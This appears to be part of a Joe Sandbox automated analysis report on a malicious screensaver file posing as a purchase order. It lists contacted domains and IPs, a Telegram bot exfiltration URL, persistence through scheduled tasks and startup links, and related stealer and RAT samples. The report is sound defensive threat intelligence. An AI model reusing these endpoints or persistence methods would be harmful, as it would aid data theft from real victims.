                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              http://checkip.dyndns.comMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                http://ocsp.entrust.net0DMicrosofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  http://82.112.184.197/savrhhvarmsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                                    http://crl.entrust.net/server1.crl0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                                      http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OWarmsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                                        http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                        https://secure.comodo.com/CPS0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                                          http://checkip.dyndns.comXMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                          http://checkip.dyndns.orgXMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                          https://api.telegram.org/bot-/sendDocument?chat_id=PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drfalse
                                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                                            http://35.164.78.200/armsvc.exe, 0000000B.00000002.639468285.00000000006C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                            13.248.148.254
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            3.94.10.34
                                                                                                                                                                                                                                                            		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                            34.246.200.160
                                                                                                                                                                                                                                                            		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            193.122.130.0
                                                                                                                                                                                                                                                            		checkip.dyndns.comUnited States
                                                                                                                                                                                                                                                            		31898ORACLE-BMC-31898USfalse
                                                                                                                                                                                                                                                            35.164.78.200
                                                                                                                                                                                                                                                            		nqwjmb.bizUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            199.59.243.228
                                                                                                                                                                                                                                                            		76899.bodis.comUnited States
                                                                                                                                                                                                                                                            		395082BODIS-NJUSfalse
                                                                                                                                                                                                                                                            165.160.13.20
                                                                                                                                                                                                                                                            		myups.bizUnited States
                                                                                                                                                                                                                                                            		19574CSCUSfalse
                                                                                                                                                                                                                                                            104.21.80.1
                                                                                                                                                                                                                                                            		reallyfreegeoip.orgUnited States
                                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                            34.227.7.138
                                                                                                                                                                                                                                                            		deoci.bizUnited States
                                                                                                                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                            208.117.43.225
                                                                                                                                                                                                                                                            		gytujflc.bizUnited States
                                                                                                                                                                                                                                                            		32748STEADFASTUSfalse
                                                                                                                                                                                                                                                            72.52.178.23
                                                                                                                                                                                                                                                            		fwiwk.bizUnited States
                                                                                                                                                                                                                                                            		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                            76.223.26.96
                                                                                                                                                                                                                                                            		084725.parkingcrew.netUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                                                                            		saytjshyf.bizUnited States
                                                                                                                                                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                            54.244.188.177
                                                                                                                                                                                                                                                            		oshhkdluh.bizUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            13.251.16.150
                                                                                                                                                                                                                                                            		ifsaia.bizUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            47.129.31.212
                                                                                                                                                                                                                                                            		xlfhhhm.bizCanada
                                                                                                                                                                                                                                                            		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                            18.246.231.120
                                                                                                                                                                                                                                                            		jpskm.bizUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            82.112.184.197
                                                                                                                                                                                                                                                            		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                            		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                            18.141.10.107
                                                                                                                                                                                                                                                            		ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                            		16509AMAZON-02USfalse

                                                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                                            Analysis ID:1591772
                                                                                                                                                                                                                                                            Start date and time:2025-01-15 12:56:03 +01:00
                                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                            Overall analysis duration:0h 8m 45s
                                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                                                                                            Number of analysed new started processes analysed:56
                                                                                                                                                                                                                                                            Number of new started drivers analysed:1
                                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                                            Sample name:PO#_1100015533.scr
                                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                                            Classification:mal100.spre.troj.spyw.evad.winSCR@52/53@63/19
                                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                                            • Found application associated with file extension: .scr

                                                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, wmpnetwk.exe, VSSVC.exe, SearchIndexer.exe, OSE.EXE, sppsvc.exe, FlashPlayerUpdateService.exe, WMIADAP.exe, conhost.exe, WmiApSrv.exe, spsys.sys, mscorsvw.exe
                                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                                            03:57:04Task SchedulerRun new task: hVVSnrrP path: C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                            03:57:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                                                                                                                                                                            03:57:18Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                            06:56:57API Interceptor75x Sleep call for process: PO#_1100015533.scr modified
                                                                                                                                                                                                                                                            06:57:00API Interceptor157x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                            06:57:02API Interceptor5x Sleep call for process: schtasks.exe modified
                                                                                                                                                                                                                                                            06:57:04API Interceptor166x Sleep call for process: taskeng.exe modified
                                                                                                                                                                                                                                                            06:57:05API Interceptor3534x Sleep call for process: armsvc.exe modified
                                                                                                                                                                                                                                                            06:57:07API Interceptor279x Sleep call for process: hVVSnrrP.exe modified
                                                                                                                                                                                                                                                            06:57:07API Interceptor5203x Sleep call for process: Microsofts.exe modified
                                                                                                                                                                                                                                                            06:57:07API Interceptor274x Sleep call for process: Trading_AIBot.exe modified
                                                                                                                                                                                                                                                            06:57:08API Interceptor200x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                                            06:57:13API Interceptor317x Sleep call for process: aspnet_state.exe modified
                                                                                                                                                                                                                                                            06:57:24API Interceptor111x Sleep call for process: ehrecvr.exe modified
                                                                                                                                                                                                                                                            06:57:26API Interceptor183x Sleep call for process: ehsched.exe modified
                                                                                                                                                                                                                                                            06:57:28API Interceptor1x Sleep call for process: FXSSVC.exe modified
                                                                                                                                                                                                                                                            06:57:29API Interceptor170x Sleep call for process: ieetwcollector.exe modified
                                                                                                                                                                                                                                                            06:57:31API Interceptor1x Sleep call for process: maintenanceservice.exe modified
                                                                                                                                                                                                                                                            06:57:34API Interceptor354x Sleep call for process: msdtc.exe modified
                                                                                                                                                                                                                                                            06:57:35API Interceptor195x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                                                                            06:57:38API Interceptor761x Sleep call for process: perfhost.exe modified
                                                                                                                                                                                                                                                            06:57:39API Interceptor146x Sleep call for process: snmptrap.exe modified
                                                                                                                                                                                                                                                            06:57:44API Interceptor133x Sleep call for process: vds.exe modified
                                                                                                                                                                                                                                                            06:57:56API Interceptor146x Sleep call for process: wbengine.exe modified
                                                                                                                                                                                                                                                            06:58:01API Interceptor970x Sleep call for process: apihost.exe modified

                                                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            13.248.148.254SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                            • ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717
                                                                                                                                                                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ww12.przvgke.biz/ewl?usid=27&utid=10221865931
                                                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                            • ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
                                                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
                                                                                                                                                                                                                                                            Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
                                                                                                                                                                                                                                                            http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                                                                                                                            http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                                                                                                                            http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • ww38.watchdogsecurity.online/favicon.ico
                                                                                                                                                                                                                                                            65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                                                                                                                            • ww12.icodeps.com/?usid=26&utid=7334446481
                                                                                                                                                                                                                                                            eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • ww38.fmoovies.to/
                                                                                                                                                                                                                                                            3.94.10.34RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/oyfrpxy
                                                                                                                                                                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ytctnunms.biz/lwt
                                                                                                                                                                                                                                                            Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ctdtgwag.biz/svjoivwb
                                                                                                                                                                                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/txfroxnfrj
                                                                                                                                                                                                                                                            IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/pggbsfikilutqo
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/xfpfkqjakhgaed
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ctdtgwag.biz/vhxrnsynbee
                                                                                                                                                                                                                                                            8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                            • lygynud.com/login.php
                                                                                                                                                                                                                                                            7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                            • lygynud.com/login.php
                                                                                                                                                                                                                                                            UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                            • lymyxid.com/login.php

                                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            jpskm.bizRJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                            • 18.246.231.120
                                                                                                                                                                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 18.246.231.120
                                                                                                                                                                                                                                                            invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                            • 18.246.231.120
                                                                                                                                                                                                                                                            Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 18.246.231.120
                                                                                                                                                                                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 34.211.97.45
                                                                                                                                                                                                                                                            IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 34.211.97.45
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 34.211.97.45
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 34.211.97.45
                                                                                                                                                                                                                                                            AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                            • 34.211.97.45
                                                                                                                                                                                                                                                            E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                            • 34.211.97.45
                                                                                                                                                                                                                                                            oshhkdluh.bizRJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                            • 54.244.188.177
                                                                                                                                                                                                                                                            76899.bodis.comRJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                            • 199.59.243.228
                                                                                                                                                                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                                                            REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                                                            Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                                                            http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                                                                            http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                            • 199.59.243.225
                                                                                                                                                                                                                                                            S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                            • 199.59.243.225

                                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            AMAZON-02US9179390927_20250115_155451.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 13.33.187.68
                                                                                                                                                                                                                                                            https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclGGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 52.29.116.175
                                                                                                                                                                                                                                                            https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSPT0wVekqsfeOZRSaz9d28itE0eTxOetbwlGaCx05rQJywXo_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aRXzCg4yzvno75Wb80hSd5kw8Ua5r4R2pwCFTS4zDFYiEkWB-2BYk1VUWtpkJwb9IQIMAq1SSLT005wiJ2XiGw1jPEr6v61MJQRnC7AeLVtxYgqGlydBoPFbs1IP04-2BxPajuRI3fTsnzWZ9ty3RasYpwuqdrF0E8VoyYkggeeLEm9ENK69uYTCVHWHpxCPkzirQSIkvpt5FNZojg491ibS35IgO0LPU5gnpEaeaUj4-2BZoFUHIAAzMMy-2BYqsZ9F9Ldu1c-3D#XGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 18.245.60.74
                                                                                                                                                                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 52.219.125.106
                                                                                                                                                                                                                                                            https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 18.245.86.58
                                                                                                                                                                                                                                                            XB6SkLK7Al.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                                                                                                                            • 3.121.114.254
                                                                                                                                                                                                                                                            AMAZON-AESUShttps://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclGGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 52.86.216.144
                                                                                                                                                                                                                                                            https://hello-messaging2-1971-naxpbw.twil.io/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 23.20.213.180
                                                                                                                                                                                                                                                            https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 34.192.22.99
                                                                                                                                                                                                                                                            https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 34.192.22.99
                                                                                                                                                                                                                                                            https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 44.215.133.88
                                                                                                                                                                                                                                                            https://amhsbz.sbs/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 3.5.27.125
                                                                                                                                                                                                                                                            https://informed.deliveryery.top/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 3.220.72.252
                                                                                                                                                                                                                                                            https://suman006723213.github.io/garena.reward.ff/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 54.225.89.216
                                                                                                                                                                                                                                                            https://api-smartdappsfix.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 34.192.226.125
                                                                                                                                                                                                                                                            http://telemgram-rv.org/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 35.153.197.139
                                                                                                                                                                                                                                                            AMAZON-02US9179390927_20250115_155451.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 13.33.187.68
                                                                                                                                                                                                                                                            https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclGGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 52.29.116.175
